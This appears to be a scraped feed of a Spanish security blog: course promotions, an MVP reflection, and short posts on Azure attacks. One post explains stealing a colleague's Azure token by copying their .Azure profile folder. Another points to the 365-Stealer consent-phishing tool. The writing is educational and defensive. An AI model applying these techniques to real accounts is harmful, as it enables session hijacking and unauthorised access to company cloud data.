src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK7MnJWRTS2HxGeBx9WtNl99URNINzhT5w597L6_3uiAZicLJddfBYVyzC_7pYuBr36RRRHaKWwdV8S_hIO2xczexDV7jhdCB79iQiir3cjXP3WCv2a0O8CE2mD7pdkVRusgxUHjQP2s0ckIDWGW2KuDI2RiZStnU2tszbnGuWxDKY8wIFpdhBsDyjk_52/w640-h142/Captura%20de%20pantalla%202023-08-25%20a%20las%2010.31.43.png" width="640" /></a></div><div style="color: #050505;"><br /></div><div><span style="background-color: black; color: white;"><br /></span></div></span><span style="background-color: black; color: white;">El problema de esta información es que no es "accionable". No podemos vincularle acciones, como haríamos con un SIEM. Pero para eso también tenemos este post donde te enseño a <a href="https://kinomakino.blogspot.com/2023/06/monitoriza-alertas-en-azure-sin-siem.html" target="_blank">guardar estos registros en Log Analytics y asociarle reglas de ejecución</a>.</span></div><div><span face="system-ui, -apple-system, system-ui, .SFNSText-Regular, sans-serif" style="color: #050505;"><span style="background-color: white;"><br /></span></span></div><div><span face="system-ui, -apple-system, system-ui, .SFNSText-Regular, sans-serif"><span style="background-color: black; color: white;">Todas estas cosas las puedes encontrar si te animas a realizar el <a href="https://formacion.seguridadsi.com/courses/Iii-edicion-especialista-en-seguridad-azure-y-365" target="_blank">cuso de Hacking y Defensa de Azure y O365</a>. </span></span></div><div><span style="background-color: black;"><span style="color: white;"><br /></span></span></div><div><span><span style="background-color: black; color: white;">Quedan pocas plazas. Quieres que te cuente en una reunión cositas sobre el curso? </span><span style="color: #050505;"><!--Principio del widget integrado de Calendly--></span>
<div class="calendly-inline-widget" data-url="https://calendly.com/seguridadsiformacion/reunionde-5minutosformacion" style="color: #050505; height: 700px; min-width: 320px;"></div>
<span style="color: #050505;"><script async="" src="https://assets.calendly.com/assets/external/widget.js" type="text/javascript"></script></span>
<span style="color: #050505;"><!--Final del widget integrado de Calendly--></span></span></div><div><span style="color: #050505;"><span style="background-color: white;"><br /></span></span></div><div><span style="color: #050505;"><span style="background-color: white;"><br /></span></span></div><div><span><span><br /><span style="background-color: black;"><span style="color: white;">Gracias por leerme !!!</span></span></span></span></div><div><span style="color: #050505;"><span style="background-color: white;"><br /></span></span></div><div><span face="system-ui, -apple-system, system-ui, .SFNSText-Regular, sans-serif" style="color: #050505;"><span style="background-color: white; font-size: 15px;"><br /></span></span></div><div><span face="system-ui, -apple-system, system-ui, .SFNSText-Regular, sans-serif" style="color: #050505;"><span style="background-color: white; font-size: 15px;"><br /></span></span><p><br /></p></div></div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-13018045356740269102023-08-11T17:55:00.000+02:002023-08-11T17:55:01.458+02:00Ataques contra Azure: Tu programador: Robo de tokens<p> Estimados amigos de Inseguros !!!</p><p>Cuando hablamos de la seguridad empresarial, son muchos los frentes que se nos presentan. El conocido perímetro, el endpoint, el no-perimetro, la cadena de suministros, los ataques de día cero, el correo, etc etc etc.</p><p>Muchas veces el enemigo lo tenemos en casa, y no me refiero a Juan que lo acepta todo, o a Pepa que es experta en descubrir como romper el ERP. No, me refiero incluso a nosotros mismos. </p><p>En este caso voy a hablar del "programador". Ese enemigo del administrador de sistemas 😉😉😉 que quiere tener Root en todos los servers. Noooo, eso ya paso verdad? xD ahora tenemos DEVOPS !!! somos Trending !!! tenemos un repo. de versiones y Jenkins !!! bien, vale. Pero no me refiero a esto. </p><p>Estoy poniendo el caso del programador, pero podría ser otro, permitirme la broma.</p><p>A lo que voy, programador que tiene en su portátil acceso a Azure, a "equis" cosas. Puede ser acceso a máquinas virtuales, al key vault de secretos, a una aplicación en concretro, al repositorio de código, a lo que sea, pero tiene algo. Ese algo puede ser la "cocina de la empresa", es decir, acceder a todos los datos, o hacerme con el dominio, o puede ser un paso intermedio hacia otro objetivo que si que me de el ansiado Administrador...</p><p>Bien, una vez tenemos el peligro, vamos a pensar. Sabemos que es un modelo de TIERS, es decir, tenemos varias zonas en nuestra empresa, y no usamos el portátil que usamos para navegar, para conectarnos al DC, TAMPOCO usamos el mismo equipo, usamos un host bastion. Bien, y el PC del programador donde lo ponemos? es un Tier 0 ? Es un Tier intermedio con procesos de desarrollo, o es un Tier 2 de un usuario?</p><p>Tenemos MFA local al equipo? tenemos cifrado de disco? no lo se cari, dímelo tu !!! este equipo, es portátil? se lo lleva de finde.?</p><p>Se está mascando la tragedia. Tenemos un usario con privilegios en nuestra infraestructura, quizás no en el dominio, pero si en Azure, y no lo estamos protegiendo como un servidor "delicado de la muerte" con mil políticas de hardening. </p><p>Ahora que sabemos que es un objetivo goloso, y parece que es fáci, vamos a imaginar un ataque complicado, rebuscado !!!Hazlo tu mismo, entre en C:\Users\kinomakino\ y busca la carpeta .Azure hazlo con el tuyo !!!</p><p>Ahora copia esta carpeta y pégasela a otro usuario. Entra en Azure y "voila" has usado el token del compañero para autenticarse. MIRA QUE COMPLEJO !!! </p><p>Claro !!! para que pase esto, hay que hacerse con el admin. local de la máquina, o con el admin del dominio, o con acceso físico, SIIIIIII, si aquí nadie regala nada. Pero igual que protegemos a los servers en profundidad, con las medidas que he comentado antes, este equipo debería tener esa protección extra.</p><p>En este caso, partimos de un entorno en el que hemos hackeado el Active Directory, pero queremos saltar al cloud. En otras ocasiones, es al revés, hemos accediro a Azure y tal...</p><p>Estas cosas no se arreglan haciendo "clicks" en uno o dos sitios, se arreglan arquitectando bien los servicios, conociendo como funcionan, qué posibilidades nos dan de fortificación, y sobre todo, sabiendo qué hacen los malos, para ir poniendo medidas.</p><p>Estas cosas no salen en la web de Microsoft. Si buscas libros, certificaciones y demás, veras los "sc-100, 200" y cosas así, que te enseñan a hacer configuraciones de seguridad, pero si quieres aprender CIberseguridad Azure y O365, <span style="font-size: medium;"><b><a href="https://formacion.seguridadsi.com/courses/Iii-edicion-especialista-en-seguridad-azure-y-365" target="_blank">tienes que hacer mi curso</a></b></span>. Así, directo, sin vaselina. Estas formaciones o las obtienes así, o cuesta MUCHO que tus chicos las aprendan.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIV2WUfnw0bhsY9CVFz0LFDzEcIxqtrHIrRvVocFja9HrIhloytnCcknxsPErQ1hc3Ga9y_wX-9Wgt3TIkOSJ1qSkhWRdW3OLA6GG5W8a1J2sBeObw7gu4RDE691qcETvxzy7IzTfnJkmRPkMT6d9EU6_eVvxUd-Ff9SG6ztB5L1GFOYEVr0OKDP9Qkv2U/s1280/Diapositiva10.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="886" data-original-width="1280" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIV2WUfnw0bhsY9CVFz0LFDzEcIxqtrHIrRvVocFja9HrIhloytnCcknxsPErQ1hc3Ga9y_wX-9Wgt3TIkOSJ1qSkhWRdW3OLA6GG5W8a1J2sBeObw7gu4RDE691qcETvxzy7IzTfnJkmRPkMT6d9EU6_eVvxUd-Ff9SG6ztB5L1GFOYEVr0OKDP9Qkv2U/w640-h444/Diapositiva10.jpeg" width="640" /></a></div><a href="http://formacion.seguridadsi.com">formacion.seguridadsi.com</a><br /><p>No esperes más. <a href="https://formacion.seguridadsi.com/courses/Iii-edicion-especialista-en-seguridad-azure-y-365" target="_blank">No te quedes atrás y da el salto hacia la seguridad Cloud.</a></p><p>Seas sysadmin, administrador de red, blue team, pentester, sea lo que sea, piensa en hacia donde quieres llegar, y confía en Seguridadsi.</p><p>Si tienes alguna duda, y quieres saber más de los cursos, tienes la web. <a href="https://calendly.com/seguridadsiformacion/reunionde-5minutosformacion" target="_blank">Puedes contactar conmigo</a> para una charla de 15 minutos y resolver todas las dudas.</p><p>Ah, se me olvida, si trabajas en España se puede bonificar.</p><p>Gracias como siempre !!!</p>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-70219785507603312272023-08-08T10:16:00.002+02:002023-08-08T10:18:40.352+02:00¿Cómo auditar tu entorno Active Directory tu mismo? Prepárate que vienen curvas<p> Estimados amigos de Inseguros !!!</p><p>Seguramente si me sigues, habrás estudiado bastante ciberseguridad, Windows, Azure, y cosas por el estilo.</p><p>En este humilde blog he ido escribiendo, y sigo haciéndolo, consejos, procesos, herramientas, ideas, tutoriales, opiniones, sobre la ciberseguridad, y muchas veces, desde la perspectiva Microsoft.<br /><br />Muchos de vosotros habéis asistido a algún <a href="https://formacion.seguridadsi.com/collections/webinars" target="_blank">Webinar gratuito</a>, o habés descargado alguno de los ebooks, como <a href="https://formacion.seguridadsi.com/courses/buscadoreshacking" target="_blank">Buscadores</a>, <a href="https://formacion.seguridadsi.com/courses/LABORATORIOSHACKING" target="_blank">laboratorios</a> o <a href="https://formacion.seguridadsi.com/courses/36controles" target="_blank">controles recomendables</a>. <i>*sabes que si haces los webinars grabados en la academia te llevas tu diploma acreditativo gratis?*</i></p><p>El otro día sacamos una <a href="https://us10.list-manage.com/survey?u=9f67f3202d84c8e79959c197f&id=596db4cced&attribution=false" target="_blank">auto-evaluación de 5 preguntas</a>, para que reflexiones sobre varios aspectos de salud de tu AD, que te invito a que hagas.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdK--Dh9n-rsk-kL2c67MTHrZExGeA1iEW03oJul0qKKIebqYNwCWVddCyBwbQmTk6MtiLfwj4FMW_0cA37OBs7wYsnD6J0fyIiYQFKdDmFsDt0lZdcTzTSZy5Wa5nPZEXHH8OoCpW9QLCxYm5RdNHK5OPM8Ljy2t0FM6aQlmR2rX3q5aPOFnSUYfX4skS/s1180/fondoscursokino2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="714" data-original-width="1180" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdK--Dh9n-rsk-kL2c67MTHrZExGeA1iEW03oJul0qKKIebqYNwCWVddCyBwbQmTk6MtiLfwj4FMW_0cA37OBs7wYsnD6J0fyIiYQFKdDmFsDt0lZdcTzTSZy5Wa5nPZEXHH8OoCpW9QLCxYm5RdNHK5OPM8Ljy2t0FM6aQlmR2rX3q5aPOFnSUYfX4skS/w640-h388/fondoscursokino2.jpg" width="640" /></a></div><br /><p>Pero, muchos de vosotos me habéis transmitido de que os falta quizás el hilo conductor.</p><p>Que hemos aprendido muchas cosas, una cosita de aquí, otra de allá, pero os falta esa visión global de cómo acometer un plan de ciberseguridad para vuestras redes.</p><p>Creo que tiene todo el sentido del mundo. Yo mismo soy de los que opinan que no es tan necesario conocer la herramienta <i>Equis</i> o <i>Zeta</i>, sino conocer los procesos, los Attack Path que emplean los malos.</p><h2 style="text-align: left;">Academia SeguridadSI</h2><p>Como todos sabéis, hace unos meses que llevo el proyecto de la academia. Si no la conoces, te invito a que te bajes el <a href="https://mcusercontent.com/9f67f3202d84c8e79959c197f/files/d801402f-916a-3021-767a-f9331ffae481/Presentacio_n.pdf" target="_blank">Dossier de presentación</a> !!!!</p><p>Para el entorno Cloud, tenemos un curso MUY potente de <a href="https://formacion.seguridadsi.com/courses/Iii-edicion-especialista-en-seguridad-azure-y-365" target="_blank">ataque y defensa a Azure y O365</a>, disponible para que lo hagas con nosotros. <i>*SEPTIEMBRE*</i></p><p>Para el entorno Microsoft en general, tenemos el "Master". El curso <a href="https://formacion.seguridadsi.com/courses/IV-edicion-seguridad-en-entornos-microsoft" target="_blank">Especialista en entornos Microsoft</a> de 3 meses. En el no solo aprendes teoría y práctica, defensiva, sino ofensiva, aprenderás a atacarte, a defenderte, a usar el cloud ( incluye el contenido del curso de Azure y O365) pero desde el punto de vista de las trincheras, del sysadmin real, del CIO que debe tomar las mejores decisiones conociendo las amenazas. NO desde el punto de vista de "haz click aquí" haz "click allá" y compra "esto" o "lo otro".</p><h2 style="text-align: left;">Próximamente</h2><p>PERO, aún así, creemos que muchos de vosotros os gusta la sangre !!! que si, que conocer Kerberos está muy bien, pero los ataques que enseñamos están ya más visto que el TBO. SI !!!! que veamos un Kerberoasting o un "Responder" no es tanto para conocer el ataque en sí, sino para conocer a bajo nivel como funciona Kerberos por un lado, y SMB/NTLM por el otro.</p><p>PERO como digo, para todos vosotros que os dedicais día a día al hacking ético, al pentesting. O para los sysadmin que queréis comenzar en ciberseguridad ofensiva, vamos a sacar el curso, el Mega curso, <a href="https://formacion.seguridadsi.com/courses/especialistaseguridadmicrosoftofensivo" target="_blank">EL MEJOR CURSO DE HACKING</a> orientado a Microsoft del mercado.</p><p>Está a punto de salir. Será un curso, que siguiendo las distintas fases de un ataque: Acceso inicial, movimientos laterales, evasión de defensas, etc Aprenderemos numerosas herramientas y procesos.</p><p>Seremos capaces de auditar nuestra organización, o la de cualquier cliente.</p><p>NO SERÁ el típico curso de Hacking Ético desactualizado que veo, por ejemplo:</p><p></p><ul style="text-align: left;"><li>Mitad del temario, manejo de linux.</li><li>Temar concretos de "elevación de privilegios" en Linux, al estilo OSCP.</li><li>Top Ten Owasp.</li><li>Un curso para aprender "fase de descubrimiento" con Nmap.</li><li>Que aparezca la palabra OSINT</li><li>Bash Scripting...</li><li>Docker...</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLPQXZ893XlaRO2FnvHMpOvmNh7tMpDIUimk6NEntB3HWZk3js-PQQc02WQLMKNdLgskwi3sfyNZuAtL9RPpBa9XktL_7SMvugz3WKVoDTPhdqAEZSzlip9fiC1jp8q_xL6Lst8Wru0QEth1_u9hDQMN-IEsXa5O1xME8-7u_2qg4KAnpZ2pKgX_oSK1BS/s717/Captura%20de%20pantalla%202023-08-08%20a%20las%2010.11.10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="357" data-original-width="717" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLPQXZ893XlaRO2FnvHMpOvmNh7tMpDIUimk6NEntB3HWZk3js-PQQc02WQLMKNdLgskwi3sfyNZuAtL9RPpBa9XktL_7SMvugz3WKVoDTPhdqAEZSzlip9fiC1jp8q_xL6Lst8Wru0QEth1_u9hDQMN-IEsXa5O1xME8-7u_2qg4KAnpZ2pKgX_oSK1BS/w640-h318/Captura%20de%20pantalla%202023-08-08%20a%20las%2010.11.10.png" width="640" /></a></div><b><div style="text-align: center;"><b><span style="color: red;">HUYE DE ESTOS "creadores de contenido". NO TRABAJAN EN ESTO</span></b></div></b><div><br /></div><div><br /></div><div>NO, ese curso está CADUCADO. Esos cursos están bien para dedicarse al hacking en general, pero el curso que vamos a sacar es un curso para usar en EMPRESAS REALES. </div><div><br /></div><div>Muchos de vosotros seguramente no hagáis nunca un CTF, ni tan siquiera os dediquéis a la ciberseguridad, estos cursos suelen ser de poco nivel técnico, muchas teclas que caducan enseguida, y que no aportan NADA a tu empresa.</div><div><br /></div><div>Las empresas reales tienen ACTIVE DIRECTORY y O365. No todas... ya lo se, pero SI la mayoría.</div><div><br /></div><div>Cansado de ver malas formaciones, estoy FOCALIZADO en esta tarea, en crear el <a href="https://formacion.seguridadsi.com/courses/especialistaseguridadmicrosoftofensivo" target="_blank">MEJOR CURSO PRÁCTICO de Hacking Microsoft</a>, y está a punto de salir.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0qT0aRQuYm_r4FSvNXWzbLvRC1G6lkXlu1brj1RNW21vudTCkoS-IsmSvw83JdDsUcIJUsFFWV6GEPXOqjN2ZYqp02O4XFqmcCRuW1Os9W9YTFVwGDoptXMFBtZg407O-0mTgadvK4dMMxoIxvwDcB7M6bs2mrR17cL8VAxyk2DhbCk4YN05Ymwh8fR1/s1688/Captura%20de%20pantalla%202023-08-07%20a%20las%2021.02.49.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="1688" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0qT0aRQuYm_r4FSvNXWzbLvRC1G6lkXlu1brj1RNW21vudTCkoS-IsmSvw83JdDsUcIJUsFFWV6GEPXOqjN2ZYqp02O4XFqmcCRuW1Os9W9YTFVwGDoptXMFBtZg407O-0mTgadvK4dMMxoIxvwDcB7M6bs2mrR17cL8VAxyk2DhbCk4YN05Ymwh8fR1/w640-h298/Captura%20de%20pantalla%202023-08-07%20a%20las%2021.02.49.png" width="640" /></a></div><br /><div><br /></div><div>He pensado subirlo grabado. Por cada Fase, <i>equis</i> procedimientos/herramientas. Así cada uno puede seguir el curso de la manera que más le convenga. Si quiere hacer un proceso de cada fase, o por si lo contrario quiere hacer todos los procesos de "Acceso Inicial".... como el alumno quiera.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigkhI2dR-dbLGVRJ8szanLoZCp6cROtLM__Az3jJk2vplTdwG4wR-E2B-4q62-sJLdvu9ySKMbcYdZ-eKBFvlWUjcMyIBZuACWt_OJjNpK_Jgd-QxV-3V48s2QKIN4UWghxZ3VTZ5cgTkFt7sK1U6AgVTBNiT2mI8_Fqvhhz6H6gctzWxbBNSpL8aPIYnu/s1695/Captura%20de%20pantalla%202023-08-07%20a%20las%2021.02.13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="793" data-original-width="1695" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigkhI2dR-dbLGVRJ8szanLoZCp6cROtLM__Az3jJk2vplTdwG4wR-E2B-4q62-sJLdvu9ySKMbcYdZ-eKBFvlWUjcMyIBZuACWt_OJjNpK_Jgd-QxV-3V48s2QKIN4UWghxZ3VTZ5cgTkFt7sK1U6AgVTBNiT2mI8_Fqvhhz6H6gctzWxbBNSpL8aPIYnu/w640-h301/Captura%20de%20pantalla%202023-08-07%20a%20las%2021.02.13.png" width="640" /></a></div><div><br /></div><div><br /></div><div>Cuando se publique me temo que verás algo de publicidad :-) pero estate preparado, porque viene un final de año cargado de acciones, de pago y gratuitas para todos los amigos de la comunidad que tanto apoyo me regaláis. </div><div><br />Por si acaso, si quieres estar al tanto de las novedades, descuentos y estas cosas, te invito a que te suscribas.</div><div><br /></div><div>Gracias por todo !!!</div><div><br /></div><div><br /></div><div><br /></div><p></p>
<script id="mcjs">!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/9f67f3202d84c8e79959c197f/da7615a273af50d2dd34aedff.js");</script>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-79987691327373489872023-07-17T08:32:00.000+02:002023-07-17T08:32:19.350+02:00Permisos sobre aplicaciones de terceros en Azure: Cómo robar tu token con un phishing.365 Stealer<p> Estimados amigos de Inseguros !!!</p><p>En el episodio de hoy, vamos a recrear un ataque muy habitual en configuraciones de Azure no bien hechas y es el robo de token mediante permisos a aplicaciones.</p><p>El concepto es muy sencillo. Un atacante registra una aplicación maliciosa en SU tenant. Nos invita a nosotros, pero nos pide permisos en NUESTRO tenant. Si no hemos configurado bien este aspecto en nuestro tenant, nuestros usuarios pueden caer facilmente. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://github.com/AlteredSecurity/365-Stealer/raw/master/Images/365-Stealer.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="283" data-original-width="800" height="226" src="https://github.com/AlteredSecurity/365-Stealer/raw/master/Images/365-Stealer.png" width="640" /></a></div><br /><p>Vamos a utilizar la herramienta O365 Stealer.</p><p>El enlace del proyecto utilizado es el <a href="https://github.com/AlteredSecurity/365-Stealer" target="_blank">este</a> y mejor que un texto, os paso el video de una de las clases donde se muestra por encima el proceso.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://youtu.be/xyDeW9BSMH8" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="1092" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglrYOqfEQ1e6x6fQ5MsxeCKCqnDYc3UsvTtOvTIxiX8pc0SFJf2p6xhbO3aq72zBRXm4jgnBfOfGr8clkm7FUetNgcgmstpKNyZ09IzTdOOkveokf6tFxpN2TjOMfyiLoSyYpNQcP_D1s5hIPHSLQkHnTdJ1510UL9HmiqUvzKAf5C-qQu_BNOpotffhfi/w640-h358/Captura%20de%20pantalla%202023-07-15%20a%20las%2020.09.30.png" width="640" /></a></div><br /><p><br /></p><p><a href="https://youtu.be/xyDeW9BSMH8" target="_blank">https://youtu.be/xyDeW9BSMH8</a><br /></p><p><br /></p><p>Y como siempre, si te gusta este contenido, puedes mirar los dos cursos que hemos sacado para Septiembre y final de año. Toda la información disponible en <a href="https://formacion.seguridadsi.com/">https://formacion.seguridadsi.com/</a></p><p>Gracias !!!</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpijxhKJXOaT8YlY_WOp_2VsmTAzCbDRZUi35wFkPPROyjTQOk0HL3W60RE-nVBQg3D4qp7Erj72NOlMKvWUAgHgyeiTsapLdKilKqwSF2KMHtsFIZRvbN2H-WBYRZIzREtC-9rl1A-aPRKnYOlEsscVkqUpwC_WAeprzhzCI6CMrT6rYqVMYUP2eTErJ6/s785/Captura%20de%20pantalla%202023-07-15%20a%20las%2020.06.56.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="785" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpijxhKJXOaT8YlY_WOp_2VsmTAzCbDRZUi35wFkPPROyjTQOk0HL3W60RE-nVBQg3D4qp7Erj72NOlMKvWUAgHgyeiTsapLdKilKqwSF2KMHtsFIZRvbN2H-WBYRZIzREtC-9rl1A-aPRKnYOlEsscVkqUpwC_WAeprzhzCI6CMrT6rYqVMYUP2eTErJ6/w640-h368/Captura%20de%20pantalla%202023-07-15%20a%20las%2020.06.56.png" width="640" /></a></div><br /><p><br /></p><p><br /></p><p><br /></p>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-27270089730467335872023-06-19T17:48:00.000+02:002023-06-19T17:48:27.644+02:00Devolver a la comunidad lo que nos da y cosas así: El camino del MVP...<p> Estimados amigos de Inseguros !!!</p><p>Muchos de vosotros sabéis que desde hace unos años tengo la suerte de ser premiado por Microsoft como <a href="https://mvp.microsoft.com/es-es/MvpSearch" target="_blank">MVP</a> de alguno de sus productos o servicios. Para mi es un orgullo, una fuente inmensa de satisfacción, un sueño hecho realidad.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWsT4IBY5UwGkV77rEx7Rqj8rm_eiEOJ3VhUwbMEn6cGDP6-sTSbJh3DjJIwEiy5V7jMDjYfbpyPGtxR4UK1z73q3vhSTFmqxNN0uBPP1Y54RPlPCsXpwWF3rTMjNc_PyLComxx8GMQxfaC3OlQJu3vNVrS1gNExpUZO9Fob3M2cioHhuRUcqffATGsw/s389/foto_cv%20copia.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="389" data-original-width="389" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWsT4IBY5UwGkV77rEx7Rqj8rm_eiEOJ3VhUwbMEn6cGDP6-sTSbJh3DjJIwEiy5V7jMDjYfbpyPGtxR4UK1z73q3vhSTFmqxNN0uBPP1Y54RPlPCsXpwWF3rTMjNc_PyLComxx8GMQxfaC3OlQJu3vNVrS1gNExpUZO9Fob3M2cioHhuRUcqffATGsw/s320/foto_cv%20copia.jpeg" width="320" /></a></div><br /><p>Pero los sueños no se persiguen, aunque te digan eso en la tv. Tu puedes tener unas metas, y tienes que hacer acciones que te lleven a esas metas, pero un premio no es una meta. Un premio es algo que te viene extra, como recompensa, no se si me explico.</p><p>En el momento de salir este post, no se si estaré renovado para 2023-2024. Me lo dirán el 1 de Julio. <br /><br />El proceso de renovación de los MVP consiste en una evaluación de méritos que hacen desde el comite del premio, de tus últimos 12 meses de actividades en las comunidades.</p><p>En mi caso, me evaluan lo que he hecho de manera "comunitaria" desde el 1 abril de 2022 hasta el mismo día del 2023.</p><p>Sin saber si yo voy a ser renovado o no, yo ya llevo unos meses en los que mis contribuciones no "cuentan" para este año, esto ya está "vendido". Contarían para el siguiente año, si me renuevan. <br /><br />Pero a donde voy, yo no lo hago por eso. Yo lo hago por algo que aprendí de muchos, en concreto en las primeras <a href="https://www.navajanegra.com/" target="_blank">Navaja Negra</a>. Donde digamos conocí en persona a muchos de vosotros de la nueva vieja escuela. DEVOLVER A LA COMUNIDAD lo que esta me da, lo escuché muchas veces.</p><p>No puede ser que seas amante del GNU, pero no publiques tus códigos, alguno de ellos, o tus descubrimientos o aventuras !!! osea, tu consumes pero no aportas? <b>yo me siento en deuda con todos vosotros que ayudáis, por eso intento ayudar.</b></p><p>Recuerdas tu último año? has tenido días malos? semanas de no tener tiempo ni de ir al peluquero o afeitarte? entregas de proyectos atrasadas? noches de trabajar hasta tarde? fines de semana de decir en casa: este finde trabajo? has tenido vacaciones con la familia? puentes? yo también, igual que tu. No voy a decir ni más ni menos, como tu.</p><p>Y no se tu caso, pero yo he sacado tiempo para hacer 45 actividades fuera de mi trabajo, por la comunidad. 8 o 10 charlas en Conferencias. 8 o 10 visitas a institutos. unos 20 post...</p><p>Todo esto gratis, que tiene un coste, para mi alto, tiempo de familia, de sofa, de playa, de escribir, planificar, publicar, preparar, pero me siento en deuda con todos vosotros !!! tengo que hacerlo !!!</p><p>Si Microsoft no me diera este año el puesto, crees que dejaría de hacerlo? si me conoces, sabes la respuesta.</p><p>No espero nada de nadie, porque la gente somos egoistas. Os voy a poner un ejemplo. Conoces los <a href="https://formacion.seguridadsi.com/collections/webinars" target="_blank">webinars gratuitos que hago</a>? uno al mes. Te gustarán más, menos, no los verás, pero hay gente que si.</p><p>Pedí hace poco a unas 800 personas, que por favor, <a href="https://app.tryhoist.com/w/seguridadsi/new" target="_blank">mandasen un pequeño review en video,un saludo, un texto</a>, algo, para intentar hacer algo bonito de marketing. Sabes cuanta gente me "pago" el webinar con un comentario? 3. Lo entiendo, yo lo mismo no lo haría, pero a donde voy, no espero nada de nadie, así no me desilusiono.</p><p>Pero el propósito de este post, es el que es, que te quede claro que me siento en deuda con la comunidad, y que espero poder seguir muchos años devolviendo lo que puedo. Que todos tenemos pareja, hijos, trabajo, familias, épocas mejores y peores, pero es de biennacido ser agradecido, o algo así. xDDDD</p><p>Espero seguir muchos años aquí, y que sigas leyéndome !!!</p><p>Gracias por leerme uso al terminar siempre mis post...</p>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.com